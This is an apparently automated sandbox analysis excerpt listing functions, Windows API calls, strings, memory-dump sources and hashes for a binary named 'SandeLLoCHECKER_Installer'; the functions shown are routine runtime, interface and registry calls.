                                                                                                                        • Opcode Fuzzy Hash: 4f9c22d66514ccf958ca6495942d9fb63961d1c72284001fb9e42d63044d6a1f
                                                                                                                        • Instruction Fuzzy Hash: C351D431A00605DFDB10EF69D845BAAF7F5FF44720F14866AE529D73A0EB31AA05CB80
                                                                                                                        Function 00961370 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000000,C7BA013E), ref: 00961510
                                                                                                                          • Part of subcall function 009615D0: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,?,?,?,80004005), ref: 009615DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$EnvironmentFolderHeapPathProcessSpecialVariable
                                                                                                                        • String ID: USERPROFILE
                                                                                                                        • API String ID: 1777821646-2419442777
                                                                                                                        • Opcode ID: 8fca9c6ffe529e598cf0e34a1ccabe60354291283a0628676fd44cfb188f7567
                                                                                                                        • Instruction ID: 3d036a49679c185c0fe950e3bb09c5ee66c1e60d9c2ee2c370bfe55a49fc5ddd
                                                                                                                        • Opcode Fuzzy Hash: 8fca9c6ffe529e598cf0e34a1ccabe60354291283a0628676fd44cfb188f7567
                                                                                                                        • Instruction Fuzzy Hash: 4961AE71A006099FDB14DF6CC859BAEB7B9FF44320F14866DE816DB391DB749900CB91
                                                                                                                        Function 0088E1E0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedPushEntrySList.KERNEL32(00B30AF0,00B30B48,Windows.UI.Xaml.Input.KeyboardAccelerator,00000029,C7BA013E,?,00AB0A34,?), ref: 0088E3A6
                                                                                                                        Strings
                                                                                                                        • Windows.UI.Xaml.Input.KeyboardAccelerator, xrefs: 0088E2FA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EntryInterlockedListPush
                                                                                                                        • String ID: Windows.UI.Xaml.Input.KeyboardAccelerator
                                                                                                                        • API String ID: 4129690577-1815025733
                                                                                                                        • Opcode ID: 00a7089c7223e6c520c13b13babdd47a9b582b15e853fb0ceff8d4773abba4b2
                                                                                                                        • Instruction ID: 58b2d255f1d4c4bdf2570114184aa7d3e0e6e0e3e8d3c09a242ca7fa8e1c2642
                                                                                                                        • Opcode Fuzzy Hash: 00a7089c7223e6c520c13b13babdd47a9b582b15e853fb0ceff8d4773abba4b2
                                                                                                                        • Instruction Fuzzy Hash: 2E518B71900219EFDB10DF98C955BAEFBB4FF04718F20456AE915AB380D7B5AA04CBD1
                                                                                                                        Function 008A81B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Windows.UI.Xaml.Controls.Grid, xrefs: 008A825A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Windows.UI.Xaml.Controls.Grid
                                                                                                                        • API String ID: 0-2024751149
                                                                                                                        • Opcode ID: e03d0e4d96ceae2542535b28a56a62522af57ac572a16032811f3417efd1c2f0
                                                                                                                        • Instruction ID: 14c06272b8ccea9bd377ff7ce57f5015935451141792a491d19e292023a661a7
                                                                                                                        • Opcode Fuzzy Hash: e03d0e4d96ceae2542535b28a56a62522af57ac572a16032811f3417efd1c2f0
                                                                                                                        • Instruction Fuzzy Hash: D3516971D00219EFDB00DF98D945BEEBBB8FB04718F20452AE815A7381DBB55A04CBE1
                                                                                                                        Function 008A7F40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Windows.UI.Xaml.Controls.Button, xrefs: 008A7FEA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Windows.UI.Xaml.Controls.Button
                                                                                                                        • API String ID: 0-66595721
                                                                                                                        • Opcode ID: 77e1cecefe6f0611930969fecf508d7349c29f900c05805571dba3e8e05f9b16
                                                                                                                        • Instruction ID: 7055d6a2739b42285b17135753a2b042c4361717fc1c29bc150fe328ef42efe5
                                                                                                                        • Opcode Fuzzy Hash: 77e1cecefe6f0611930969fecf508d7349c29f900c05805571dba3e8e05f9b16
                                                                                                                        • Instruction Fuzzy Hash: EA519D71D04219EFDB00DF98C945BEEBBB8FF04714F20452AE815A7281DB746A04CBE1
                                                                                                                        Function 008A7190 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedPushEntrySList.KERNEL32(00B30AF0,00B30C38,Windows.UI.Xaml.Media.Imaging.BitmapImage,00000029,C7BA013E,00000000,000000C8,?,00B30C34,00A3E897,000000FF), ref: 008A7268
                                                                                                                        Strings
                                                                                                                        • Windows.UI.Xaml.Media.Imaging.BitmapImage, xrefs: 008A71BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EntryInterlockedListPush
                                                                                                                        • String ID: Windows.UI.Xaml.Media.Imaging.BitmapImage
                                                                                                                        • API String ID: 4129690577-320498557
                                                                                                                        • Opcode ID: 77b6d048b39f4308ef0671a05f478ca5aa450dc3109d1a46d3cdaff6e933398e
                                                                                                                        • Instruction ID: ac561df6fee5d6385505d334cbee3effc326679965b9da905f696e05db879e89
                                                                                                                        • Opcode Fuzzy Hash: 77b6d048b39f4308ef0671a05f478ca5aa450dc3109d1a46d3cdaff6e933398e
                                                                                                                        • Instruction Fuzzy Hash: 99318B71D1521EABDB00DFA8CD55BEEBBB4FF05314F20456AE801A7291DBB45A04CBD1
                                                                                                                        Function 0088DD80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedPushEntrySList.KERNEL32(00B30AF0,00B30B38,Windows.UI.Xaml.Documents.Run,0000001D,C7BA013E,00000000,000000B8,?,00B30B34,00A3E897,000000FF), ref: 0088DE58
                                                                                                                        Strings
                                                                                                                        • Windows.UI.Xaml.Documents.Run, xrefs: 0088DDAA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EntryInterlockedListPush
                                                                                                                        • String ID: Windows.UI.Xaml.Documents.Run
                                                                                                                        • API String ID: 4129690577-4058747365
                                                                                                                        • Opcode ID: 8abb876c7f52fb94f184df6f931e68b2a77d8af9cfc0bcadf4e3779603bdd7c7
                                                                                                                        • Instruction ID: 9f7f8486883e42b7ea2d5b97dda1ccbd9a63c781a0063ae48eb26043e324a27a
                                                                                                                        • Opcode Fuzzy Hash: 8abb876c7f52fb94f184df6f931e68b2a77d8af9cfc0bcadf4e3779603bdd7c7
                                                                                                                        • Instruction Fuzzy Hash: 7C319C71D1121AEBCB00EF98C845BAEFBB4FF14718F20406AE814AB2D1E7B05A04CBD1
                                                                                                                        Function 008A6D50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InterlockedPushEntrySList.KERNEL32(00B30AF0,00B30C28,Windows.UI.Xaml.Controls.Image,0000001E,C7BA013E,00000000,000000B4,?,00B30C24,00A3E897,000000FF), ref: 008A6E28
                                                                                                                        Strings
                                                                                                                        • Windows.UI.Xaml.Controls.Image, xrefs: 008A6D7A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EntryInterlockedListPush
                                                                                                                        • String ID: Windows.UI.Xaml.Controls.Image
                                                                                                                        • API String ID: 4129690577-940143292
                                                                                                                        • Opcode ID: 6297938379a8ae5b0665bdc4b694caeb995def4520efdc7dd12e8c5025d8300a
                                                                                                                        • Instruction ID: 0f3e071dedf010a72e5f2a5291224c5693fc7f0f1bf510bdfd96548657df92f2
                                                                                                                        • Opcode Fuzzy Hash: 6297938379a8ae5b0665bdc4b694caeb995def4520efdc7dd12e8c5025d8300a
                                                                                                                        • Instruction Fuzzy Hash: 3E31BC71D00219EBDB00DFA8C945BEEFBB4FF04314F20052AE811A7681EBB15A08CBD1
                                                                                                                        Function 00945500 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00945572
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                        • String ID: 5(I
                                                                                                                        • API String ID: 2296764815-2411506167
                                                                                                                        • Opcode ID: 4231034018271248a0d1028328f0f76a47f33cf6674e68a926035dc6c747c257
                                                                                                                        • Instruction ID: 95d2d03e16a7ffc505811206e39e98b785430ea751c534206458d2985e48fda3
                                                                                                                        • Opcode Fuzzy Hash: 4231034018271248a0d1028328f0f76a47f33cf6674e68a926035dc6c747c257
                                                                                                                        • Instruction Fuzzy Hash: 4F017CB1A44A44EBCB11DF98ED42B5973E4E709724F618769F816C37E1DA36AD008A06
                                                                                                                        Function 00A35F4A Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A35A7A: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00A35AA5
                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00A35D91,?,00000000,?,?,?), ref: 00A35FAB
                                                                                                                        • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A35D91,?,00000000,?,?,?), ref: 00A35FED
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 546120528-0
                                                                                                                        • Opcode ID: 6907d5516944d2ef3c02e0cc0b6dc75e4620c631d269d795b781cbe7795f5622
                                                                                                                        • Instruction ID: 175ab67a295be710de9f6e9a41646ebab0a02a12f01331e89a0a70ad95ec1929
                                                                                                                        • Opcode Fuzzy Hash: 6907d5516944d2ef3c02e0cc0b6dc75e4620c631d269d795b781cbe7795f5622
                                                                                                                        • Instruction Fuzzy Hash: 64512671E007456EDB25CF75C8826AABBF5EF46304F18C16EF0828B251E7759946CB90
                                                                                                                        Function 00993EB0 Relevance: 3.2, APIs: 2, Instructions: 174registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,000000C8,00000000,000000C8,000000C8), ref: 00993F1E
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000002,00000000,00000002,00000002,000000C8), ref: 00993F60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        • Opcode ID: 519fef07034ddc7b9085d947a42d8696ef95300717cbf582bd4fa3d3a56c5056
                                                                                                                        • Instruction ID: faa1ca8208ce6ff85128124d215a95ad3701b1fa75b98d5ef23d5d6ca511385c
                                                                                                                        • Opcode Fuzzy Hash: 519fef07034ddc7b9085d947a42d8696ef95300717cbf582bd4fa3d3a56c5056
                                                                                                                        • Instruction Fuzzy Hash: 625180B1D00209ABDF21DF98C845BBFB7B8FF15310F144519E911E7291EB359A05CBA2
                                                                                                                        Function 009A6CA0 Relevance: 3.1, APIs: 2, Instructions: 131COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 009A6CF1
                                                                                                                        • EndDialog.USER32(00000000,00000001), ref: 009A6D00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2634769047-0
                                                                                                                        • Opcode ID: e56a171ae79bd7ef658fdb5174cb934f8c9d9fd4d389ecfbef98da49376c6a72
                                                                                                                        • Instruction ID: ca2811c8e4df390a70f653b8066c53b8318293f81b57d92cc55e3f97da36e8e1
                                                                                                                        • Opcode Fuzzy Hash: e56a171ae79bd7ef658fdb5174cb934f8c9d9fd4d389ecfbef98da49376c6a72
                                                                                                                        • Instruction Fuzzy Hash: FA519A30A01B85DFD711CF68CA48B4AFBF4FF4A314F1886ADD4559B2A1D774AA04CB91
                                                                                                                        Function 00982070 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(009819D1), ref: 00982070
                                                                                                                        • DestroyWindow.USER32(00000000,?,00000000), ref: 00982127
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DestroyErrorLastWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1182162058-0
                                                                                                                        • Opcode ID: 6e91b39d534832fd614a6e039732d4054c950b8b317de6ad3d4847c0c7687372
                                                                                                                        • Instruction ID: 174cd29162ea2c24b66ece6db636d02659f22c5dd1c175842cd4fdbc8a9376f9
                                                                                                                        • Opcode Fuzzy Hash: 6e91b39d534832fd614a6e039732d4054c950b8b317de6ad3d4847c0c7687372
                                                                                                                        • Instruction Fuzzy Hash: F821E47560010A5BD720AF08EC06BAA77A8EB55321F100276FD08CB791DB76E862DBE1
                                                                                                                        Function 00964720 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00963D30: LoadLibraryW.KERNEL32(ComCtl32.dll,C7BA013E,?,00000000,00000000), ref: 00963D6E
                                                                                                                          • Part of subcall function 00963D30: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00963D91
                                                                                                                          • Part of subcall function 00963D30: FreeLibrary.KERNEL32(00000000), ref: 00963E0F
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00964764
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0096476F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryMessageSend$AddressFreeLoadProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3032493519-0
                                                                                                                        • Opcode ID: f9a5df82e657fb8e003d2fb718f237e9a3ceea305f298408c25ba743d1c48626
                                                                                                                        • Instruction ID: 1e6366a61de143b822d195b6b625bc8083cbeb010ee2c1ed109347da6ad927ba
                                                                                                                        • Opcode Fuzzy Hash: f9a5df82e657fb8e003d2fb718f237e9a3ceea305f298408c25ba743d1c48626
                                                                                                                        • Instruction Fuzzy Hash: A2F0653179121837F66021595C57F67B64DD781BA4F104276FE99AF2C2ECC67D0103E8
                                                                                                                        Function 00A2FF08 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LCMapStringEx.KERNEL32(?,00A3028A,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A2FF3C
